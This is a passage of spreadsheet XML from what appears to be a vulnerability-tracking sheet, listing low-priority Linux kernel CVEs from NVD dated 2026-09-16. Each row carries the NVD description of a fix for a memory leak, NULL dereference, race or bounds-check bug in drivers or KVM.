      <c r="I1593" s="5" t="inlineStr"/>
      <c r="J1593" s="5" t="inlineStr"/>
      <c r="K1593" s="5" t="inlineStr"/>
      <c r="L1593" s="5" t="inlineStr"/>
      <c r="M1593" s="5" t="inlineStr"/>
      <c r="N1593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1593" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1593" s="5" t="inlineStr"/>
      <c r="Q1593" s="5" t="inlineStr"/>
      <c r="R1593" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: cec: core: Fix kmemleak due to missed rc_free_device() call
The commit dccc0c3ddf8f ("media: rc: fix race between unregister and
urb/irq callbacks") removed the implicit call to rc_free_device() from
rc_unregister_device(). However, the commit missed to remove the NULL
assignment of adap-&gt;rc that is now causing rc_free_device() to never be
called on an allocated rc device.
kmemleak reports following after e.g. dw-hdmi unbind:
unreferenced object 0xffff00010ac10000 (size 4096):
  comm "kworker/u16:1", pid 39, jiffies 4294897739
  hex dump (first 32 bytes):
    20 23 4b 0a 01 00 ff ff 08 00 c1 0a 01 00 ff ff   #K.............
    08 00 c1 0a 01 00 ff ff 00 00 00 00 00 00 00 00  ................
  backtrace (crc e11baccc):
    kmemleak_alloc+0x38/0x44
    __kmalloc_cache_noprof+0x4a8/0x5e0
    rc_allocate_device+0x48/0x2a0
    cec_allocate_adapter+0x3ac/0x800
    dw_hdmi_cec_probe+0x264/0x634
    platform_probe+0xc0/0x188
    really_probe+0x4a4/0x8e0
    __driver_probe_device+0x2f8/0x440
    driver_probe_device+0x60/0x160
    __device_attach_driver+0x1a0/0x2a0
    bus_for_each_drv+0x100/0x1a0
    __device_attach+0x174/0x350
    device_initial_probe+0x90/0xb0
    bus_probe_device+0x4c/0x120
    device_add+0xdec/0x116c
    platform_device_add+0x354/0x598
Remove the assignment of adap-&gt;rc to NULL to let cec_delete_adapter()
free the allocated rc device after last user of the cec device exits to
fix the kmemleak.</t>
        </is>
      </c>
      <c r="S1593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89900</t>
        </is>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89901</t>
        </is>
      </c>
      <c r="D1594" s="5" t="inlineStr"/>
      <c r="E1594" s="5" t="inlineStr"/>
      <c r="F1594" s="5" t="inlineStr"/>
      <c r="G1594" s="5" t="inlineStr"/>
      <c r="H1594" s="5" t="inlineStr"/>
      <c r="I1594" s="5" t="inlineStr"/>
      <c r="J1594" s="5" t="inlineStr"/>
      <c r="K1594" s="5" t="inlineStr"/>
      <c r="L1594" s="5" t="inlineStr"/>
      <c r="M1594" s="5" t="inlineStr"/>
      <c r="N1594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1594" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1594" s="5" t="inlineStr"/>
      <c r="Q1594" s="5" t="inlineStr"/>
      <c r="R1594" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: airspy: use vb2_video_unregister_device() on disconnect to fix NULL deref
airspy_disconnect() clears s-&gt;udev under v4l2_lock, but
airspy_stop_streaming() unconditionally calls airspy_ctrl_msg() and
airspy_free_stream_bufs() afterwards. If a streaming user closes the
device after disconnect, stop_streaming() runs and dereferences the
NULL s-&gt;udev:
  airspy_stop_streaming()
    airspy_ctrl_msg(s, CMD_RECEIVER_MODE, 0, 0, NULL, 0)
      usb_sndctrlpipe(s-&gt;udev, 0)         /* NULL deref */
    airspy_free_stream_bufs(s)
      usb_free_coherent(s-&gt;udev, ...)     /* NULL deref */
The airspy driver uses vb2_fop_release() in its file_operations, so
replace video_unregister_device(&amp;s-&gt;vdev) with
vb2_video_unregister_device(&amp;s-&gt;vdev) and move it before clearing
s-&gt;udev. vb2_video_unregister_device() releases the vb2 queue, which
synchronously runs airspy_stop_streaming() if streaming is active, so
the URBs, coherent DMA stream buffers and the hardware stop control
message all execute while s-&gt;udev is still valid.
vb2_video_unregister_device() locks vdev-&gt;queue-&gt;lock (vb_queue_lock)
internally, and stop_streaming() locks v4l2_lock, so the previous outer
mutex_lock(&amp;s-&gt;vb_queue_lock) / mutex_lock(&amp;s-&gt;v4l2_lock) pair around
the unregister sequence would self-deadlock and has been removed. A
short v4l2_lock critical section around s-&gt;udev = NULL remains so any
ioctl path that still holds the file descriptor sees coherent state.
Issue identified by automated review of the INV-003 series at
https://sashiko.dev/</t>
        </is>
      </c>
      <c r="S1594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89901</t>
        </is>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89905</t>
        </is>
      </c>
      <c r="D1595" s="5" t="inlineStr"/>
      <c r="E1595" s="5" t="inlineStr"/>
      <c r="F1595" s="5" t="inlineStr"/>
      <c r="G1595" s="5" t="inlineStr"/>
      <c r="H1595" s="5" t="inlineStr"/>
      <c r="I1595" s="5" t="inlineStr"/>
      <c r="J1595" s="5" t="inlineStr"/>
      <c r="K1595" s="5" t="inlineStr"/>
      <c r="L1595" s="5" t="inlineStr"/>
      <c r="M1595" s="5" t="inlineStr"/>
      <c r="N1595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1595" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1595" s="5" t="inlineStr"/>
      <c r="Q1595" s="5" t="inlineStr"/>
      <c r="R1595" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: BPF: Move arena register slot below TCC context
Currently, the stack layout places the optional arena register slot
above the tail call counter context. When arena_vm_start is dynamically
enabled, it shifts the relative offset of the tcc_ptr slot within the
stack frame, causing hardcoded tracking macros to mismatch and leading
to memory misalignment or corruption potentially.
To fix this, move the arena register save and restore sequences below
the tail call counter context slots in both build_prologue() and the
epilogue.
Update __build_epilogue() to insert a proper offset decrement to safely
skip the unneeded tcc_ptr reading block while accurately aligning with
the relocated arena slot at the very bottom.
With this patch, the tcc_ptr slot is always positioned at a fixed
distance directly underneath the base callee-saved registers that is
independent of whether the arena features are on.</t>
        </is>
      </c>
      <c r="S1595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89905</t>
        </is>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89909</t>
        </is>
      </c>
      <c r="D1596" s="5" t="inlineStr"/>
      <c r="E1596" s="5" t="inlineStr"/>
      <c r="F1596" s="5" t="inlineStr"/>
      <c r="G1596" s="5" t="inlineStr"/>
      <c r="H1596" s="5" t="inlineStr"/>
      <c r="I1596" s="5" t="inlineStr"/>
      <c r="J1596" s="5" t="inlineStr"/>
      <c r="K1596" s="5" t="inlineStr"/>
      <c r="L1596" s="5" t="inlineStr"/>
      <c r="M1596" s="5" t="inlineStr"/>
      <c r="N1596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1596" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1596" s="5" t="inlineStr"/>
      <c r="Q1596" s="5" t="inlineStr"/>
      <c r="R1596" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Free init resources if kvm_init() fails
kvm_loongarch_init() calls kvm_loongarch_env_init() to allocate the
per-CPU kvm_context (vmcs) and kvm_loongarch_ops and to register the
perf callbacks, and then calls kvm_init(). If kvm_init() fails its
result is returned directly, but since module_init() does not run the
module_exit() stuff on failure, so kvm_loongarch_env_exit() is never
called and those resources are leaked.
So call kvm_loongarch_env_exit() when kvm_init() fails, matching the
teardown-on-failure pattern used by riscv_kvm_init().</t>
        </is>
      </c>
      <c r="S1596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89909</t>
        </is>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89917</t>
        </is>
      </c>
      <c r="D1597" s="5" t="inlineStr"/>
      <c r="E1597" s="5" t="inlineStr"/>
      <c r="F1597" s="5" t="inlineStr"/>
      <c r="G1597" s="5" t="inlineStr"/>
      <c r="H1597" s="5" t="inlineStr"/>
      <c r="I1597" s="5" t="inlineStr"/>
      <c r="J1597" s="5" t="inlineStr"/>
      <c r="K1597" s="5" t="inlineStr"/>
      <c r="L1597" s="5" t="inlineStr"/>
      <c r="M1597" s="5" t="inlineStr"/>
      <c r="N1597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1597" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1597" s="5" t="inlineStr"/>
      <c r="Q1597" s="5" t="inlineStr"/>
      <c r="R1597" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Handle VNCR TLB invalidation race with vcpu_put() VNCR unmapping
While VNCR TLB invalidation always occurs under the MMU lock,
vcpu_put() doesn't, while it unmaps the VNCR page.
The problem is that the invalidation evaluates vncr_tlb::cpu to
decide whether an unmapping needs to take place (cpu != -1) before
performing it. On the other hand, this_cpu_reset_vncr_fixmap()
unconditionally unmaps if L1_VNCR_MAPPED is set.
These two obviously can race, with a TOCTOU pattern on the TLBI
path, and a BUG_ON() on the vcpu_put() path. And the two can end-up
calling vncr_fixmap(-1), with extra lethal effects.
Move the reset of vncr_tlb::cpu to -1 to a common function, and make
this update atomic so that only a single thread can reset the field
and perform the corresponding unmap. The vcpu_put() still need to
unconditionally unmap the current VNCR to close another ugly race.
Finally, the assignment of vncr_tlb::cpu is moved to be kept in sync
with the actual mapping, similar to L1_VNCR_MAPPED being set.</t>
        </is>
      </c>
      <c r="S1597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89917</t>
        </is>
      </c>
    </row>
    <row r="1598">
      <c r="A1598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89921</t>
        </is>
      </c>
      <c r="D1598" s="5" t="inlineStr"/>
      <c r="E1598" s="5" t="inlineStr"/>
      <c r="F1598" s="5" t="inlineStr"/>
      <c r="G1598" s="5" t="inlineStr"/>
      <c r="H1598" s="5" t="inlineStr"/>
      <c r="I1598" s="5" t="inlineStr"/>
      <c r="J1598" s="5" t="inlineStr"/>
      <c r="K1598" s="5" t="inlineStr"/>
      <c r="L1598" s="5" t="inlineStr"/>
      <c r="M1598" s="5" t="inlineStr"/>
      <c r="N1598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1598" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1598" s="5" t="inlineStr"/>
      <c r="Q1598" s="5" t="inlineStr"/>
      <c r="R1598" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Zero initialize data structures for inject_pfault_token
__kvm_inject_pfault_token() only sets .type and .u.ext.ext_params2 of
the on-stack struct kvm_s390_irq but the full ext substructure is copied
into the cpu local variable on inject. ext_params and pad contain stale
stack values.
Interrupt delivery only uses ext_params2, so nothing leaks to the guest,
but a host user can use the migration ioctls to get to the data.
Fix by zero-initializing the irq struct.
Do the same for the inti data structure.</t>
        </is>
      </c>
      <c r="S1598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89921</t>
        </is>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89923</t>
        </is>
      </c>
      <c r="D1599" s="5" t="inlineStr"/>
      <c r="E1599" s="5" t="inlineStr"/>
      <c r="F1599" s="5" t="inlineStr"/>
      <c r="G1599" s="5" t="inlineStr"/>
      <c r="H1599" s="5" t="inlineStr"/>
      <c r="I1599" s="5" t="inlineStr"/>
      <c r="J1599" s="5" t="inlineStr"/>
      <c r="K1599" s="5" t="inlineStr"/>
      <c r="L1599" s="5" t="inlineStr"/>
      <c r="M1599" s="5" t="inlineStr"/>
      <c r="N1599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1599" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1599" s="5" t="inlineStr"/>
      <c r="Q1599" s="5" t="inlineStr"/>
      <c r="R1599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Free guest debug data on vcpu destroy
kvm_s390_clear_bp_data() is only called from
kvm_arch_vcpu_ioctl_set_guest_debug(), i.e. when user space changes or
disables debugging. A vCPU that is destroyed while hardware breakpoints
are still armed - the normal case when the VMM just exits or crashes -
leaks hw_bp_info, hw_wp_info and all old_data buffers, since generic KVM
frees the vCPU right after kvm_arch_vcpu_destroy().
That is bounded by MAX_BP_COUNT entries, so roughly 8 KiB per vCPU, but
it is unbounded over VM lifetimes. The allocations are
GFP_KERNEL_ACCOUNT, so the charge also outlives the exiting process and
pins dying memcgs.
Fix by clearing the debug data on vCPU destruction. Calling it
unconditionally is fine: struct kvm_vcpu is zero allocated, so for a vCPU
that never enabled debugging the counters are 0 and the pointers NULL.</t>
        </is>
      </c>
      <c r="S1599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89923</t>
        </is>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89924</t>
        </is>
      </c>
      <c r="D1600" s="5" t="inlineStr"/>
      <c r="E1600" s="5" t="inlineStr"/>
      <c r="F1600" s="5" t="inlineStr"/>
      <c r="G1600" s="5" t="inlineStr"/>
      <c r="H1600" s="5" t="inlineStr"/>
      <c r="I1600" s="5" t="inlineStr"/>
      <c r="J1600" s="5" t="inlineStr"/>
      <c r="K1600" s="5" t="inlineStr"/>
      <c r="L1600" s="5" t="inlineStr"/>
      <c r="M1600" s="5" t="inlineStr"/>
      <c r="N1600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1600" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1600" s="5" t="inlineStr"/>
      <c r="Q1600" s="5" t="inlineStr"/>
      <c r="R1600" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix old_data leak in guest debug error path
__import_wp_info() allocates a per-watchpoint old_data buffer to back up
the original guest memory contents. If a later watchpoint of the same
KVM_SET_GUEST_DEBUG request fails to import, kvm_s390_import_bp_data()
jumps to the error label, which frees the wp_info array but not the
old_data buffers of the entries that were imported successfully. Up to
MAX_BP_COUNT - 1 buffers of up to MAX_WP_SIZE bytes are leaked per failed
request, and the request can be repeated.
Create error handling for cleaning up all created old_data memory
areas.</t>
        </is>
      </c>
      <c r="S1600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89924</t>
        </is>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89925</t>
        </is>
      </c>
      <c r="D1601" s="5" t="inlineStr"/>
      <c r="E1601" s="5" t="inlineStr"/>
      <c r="F1601" s="5" t="inlineStr"/>
      <c r="G1601" s="5" t="inlineStr"/>
      <c r="H1601" s="5" t="inlineStr"/>
      <c r="I1601" s="5" t="inlineStr"/>
      <c r="J1601" s="5" t="inlineStr"/>
      <c r="K1601" s="5" t="inlineStr"/>
      <c r="L1601" s="5" t="inlineStr"/>
      <c r="M1601" s="5" t="inlineStr"/>
      <c r="N1601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1601" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1601" s="5" t="inlineStr"/>
      <c r="Q1601" s="5" t="inlineStr"/>
      <c r="R1601" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix memory leak in guest debug handling
bp_data is freed only for the error case by kfree(bp_data).
Every successful KVM_SET_GUEST_DEBUG will leak bp_data.</t>
        </is>
      </c>
      <c r="S1601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89925</t>
        </is>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89926</t>
        </is>
      </c>
      <c r="D1602" s="5" t="inlineStr"/>
      <c r="E1602" s="5" t="inlineStr"/>
      <c r="F1602" s="5" t="inlineStr"/>
      <c r="G1602" s="5" t="inlineStr"/>
      <c r="H1602" s="5" t="inlineStr"/>
      <c r="I1602" s="5" t="inlineStr"/>
      <c r="J1602" s="5" t="inlineStr"/>
      <c r="K1602" s="5" t="inlineStr"/>
      <c r="L1602" s="5" t="inlineStr"/>
      <c r="M1602" s="5" t="inlineStr"/>
      <c r="N1602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1602" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1602" s="5" t="inlineStr"/>
      <c r="Q1602" s="5" t="inlineStr"/>
      <c r="R1602" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: Fix length check __import_wp_info()
struct kvm_hw_breakpoint::len is a __u64 that is fully controlled by user
space. This is then assigned to wp_info-&gt;len, which is an int. The bounds
check is done on the truncated value while the allocation uses the
untruncated one:
	wp_info-&gt;len = bp_data-&gt;len;
	[...]
	if (wp_info-&gt;len &lt; 0 || wp_info-&gt;len &gt; MAX_WP_SIZE)
		return -EINVAL;
	wp_info-&gt;old_data = kmalloc(bp_data-&gt;len, GFP_KERNEL_ACCOUNT);
Use the validated value for the allocation as intended. Without this
fix userspace can trigger &gt;4GB allocations which will fail and result
in a WARN due to MAX_PAGE_ORDER.</t>
        </is>
      </c>
      <c r="S1602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89926</t>
        </is>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89931</t>
        </is>
      </c>
      <c r="D1603" s="5" t="inlineStr"/>
      <c r="E1603" s="5" t="inlineStr"/>
      <c r="F1603" s="5" t="inlineStr"/>
      <c r="G1603" s="5" t="inlineStr"/>
      <c r="H1603" s="5" t="inlineStr"/>
      <c r="I1603" s="5" t="inlineStr"/>
      <c r="J1603" s="5" t="inlineStr"/>
      <c r="K1603" s="5" t="inlineStr"/>
      <c r="L1603" s="5" t="inlineStr"/>
      <c r="M1603" s="5" t="inlineStr"/>
      <c r="N1603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1603" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1603" s="5" t="inlineStr"/>
      <c r="Q1603" s="5" t="inlineStr"/>
      <c r="R1603" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nVMX: Ensure KVM_REQ_GET_NESTED_STATE_PAGES is cleared on VM-Exit
Always check and clear KVM_REQ_GET_NESTED_STATE_PAGES when emulating a
nested VM-Exit to ensure the request is cleared, even when KVM was built
with CONFIG_KVM_HYPERV=n, as KVM subtly relies on the "check" to clear
the flag and thus avoid double-mapping the vmcs12 pages, e.g. if KVM
manages to bail from VM-Enter without processing the request, and then
emulates VMLAUNCH or VMRESUME.</t>
        </is>
      </c>
      <c r="S1603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89931</t>
        </is>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89933</t>
        </is>
      </c>
      <c r="D1604" s="5" t="inlineStr"/>
      <c r="E1604" s="5" t="inlineStr"/>
      <c r="F1604" s="5" t="inlineStr"/>
      <c r="G1604" s="5" t="inlineStr"/>
      <c r="H1604" s="5" t="inlineStr"/>
      <c r="I1604" s="5" t="inlineStr"/>
      <c r="J1604" s="5" t="inlineStr"/>
      <c r="K1604" s="5" t="inlineStr"/>
      <c r="L1604" s="5" t="inlineStr"/>
      <c r="M1604" s="5" t="inlineStr"/>
      <c r="N1604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1604" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1604" s="5" t="inlineStr"/>
      <c r="Q1604" s="5" t="inlineStr"/>
      <c r="R1604" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: pressure: dps310: fix NULL pointer dereference on ACPI probe
When the device is enumerated through its ACPI HID (IFX3100),
i2c_client_get_device_id() returns NULL: the ACPI-derived client name
does not match the driver's i2c_device_id table. dps310_probe() then
dereferences that NULL pointer in "iio-&gt;name = id-&gt;name" and crashes the
kernel during probe.
The IIO device name is always "dps310", so set it directly and drop the
now-unused device-id lookup.</t>
        </is>
      </c>
      <c r="S1604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89933</t>
        </is>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89934</t>
        </is>
      </c>
      <c r="D1605" s="5" t="inlineStr"/>
      <c r="E1605" s="5" t="inlineStr"/>
      <c r="F1605" s="5" t="inlineStr"/>
      <c r="G1605" s="5" t="inlineStr"/>
      <c r="H1605" s="5" t="inlineStr"/>
      <c r="I1605" s="5" t="inlineStr"/>
      <c r="J1605" s="5" t="inlineStr"/>
      <c r="K1605" s="5" t="inlineStr"/>
      <c r="L1605" s="5" t="inlineStr"/>
      <c r="M1605" s="5" t="inlineStr"/>
      <c r="N1605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1605" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1605" s="5" t="inlineStr"/>
      <c r="Q1605" s="5" t="inlineStr"/>
      <c r="R1605" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: light: ltrf216a: fix runtime PM reference leak in error path
ltrf216a_get_lux() acquires a runtime PM reference by calling
ltrf216a_set_power_state(data, true). However, if
ltrf216a_read_data() fails, the function returns immediately without
dropping the reference.
This leaves the runtime PM usage count unbalanced, preventing the device
from autosuspending after a failed read.
Fix this by releasing the runtime PM reference before returning from the
error path.</t>
        </is>
      </c>
      <c r="S1605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89934</t>
        </is>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89935</t>
        </is>
      </c>
      <c r="D1606" s="5" t="inlineStr"/>
      <c r="E1606" s="5" t="inlineStr"/>
      <c r="F1606" s="5" t="inlineStr"/>
      <c r="G1606" s="5" t="inlineStr"/>
      <c r="H1606" s="5" t="inlineStr"/>
      <c r="I1606" s="5" t="inlineStr"/>
      <c r="J1606" s="5" t="inlineStr"/>
      <c r="K1606" s="5" t="inlineStr"/>
      <c r="L1606" s="5" t="inlineStr"/>
      <c r="M1606" s="5" t="inlineStr"/>
      <c r="N1606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1606" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1606" s="5" t="inlineStr"/>
      <c r="Q1606" s="5" t="inlineStr"/>
      <c r="R1606" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: light: apds9306: fix PM reference leak in apds9306_read_data()
apds9306_read_data() calls pm_runtime_resume_and_get() but several
error paths return directly without calling pm_runtime_put_autosuspend(),
leaking the runtime PM reference and preventing the device from
autosuspending.
Use PM_RUNTIME_ACQUIRE_AUTOSUSPEND() and PM_RUNTIME_ACQUIRE_ERR() to
automatically handle runtime PM reference release on all return paths.</t>
        </is>
      </c>
      <c r="S1606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89935</t>
        </is>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89936</t>
        </is>
      </c>
      <c r="D1607" s="5" t="inlineStr"/>
      <c r="E1607" s="5" t="inlineStr"/>
      <c r="F1607" s="5" t="inlineStr"/>
      <c r="G1607" s="5" t="inlineStr"/>
      <c r="H1607" s="5" t="inlineStr"/>
      <c r="I1607" s="5" t="inlineStr"/>
      <c r="J1607" s="5" t="inlineStr"/>
      <c r="K1607" s="5" t="inlineStr"/>
      <c r="L1607" s="5" t="inlineStr"/>
      <c r="M1607" s="5" t="inlineStr"/>
      <c r="N1607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1607" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1607" s="5" t="inlineStr"/>
      <c r="Q1607" s="5" t="inlineStr"/>
      <c r="R1607" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: dac: m62332: Fix regulator reference count imbalance
m62332_set_value() enables the Vcc regulator on every write of a
non-zero value and disables it on every write of zero, without tracking
the channel's current state. Because the regulator is reference counted,
changing a channel directly from one non-zero value to another enables
it more than once, while a later write of zero disables it only once.
The reference count never returns to zero and the regulator is left
enabled indefinitely.
Only enable the regulator on the transition from zero to non-zero, and
only disable it on the transition from non-zero to zero, using the
previously stored channel value to detect the edge. Balance the
regulator on the I2C error path so the reference count stays consistent
if the write fails.</t>
        </is>
      </c>
      <c r="S1607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89936</t>
        </is>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89937</t>
        </is>
      </c>
      <c r="D1608" s="5" t="inlineStr"/>
      <c r="E1608" s="5" t="inlineStr"/>
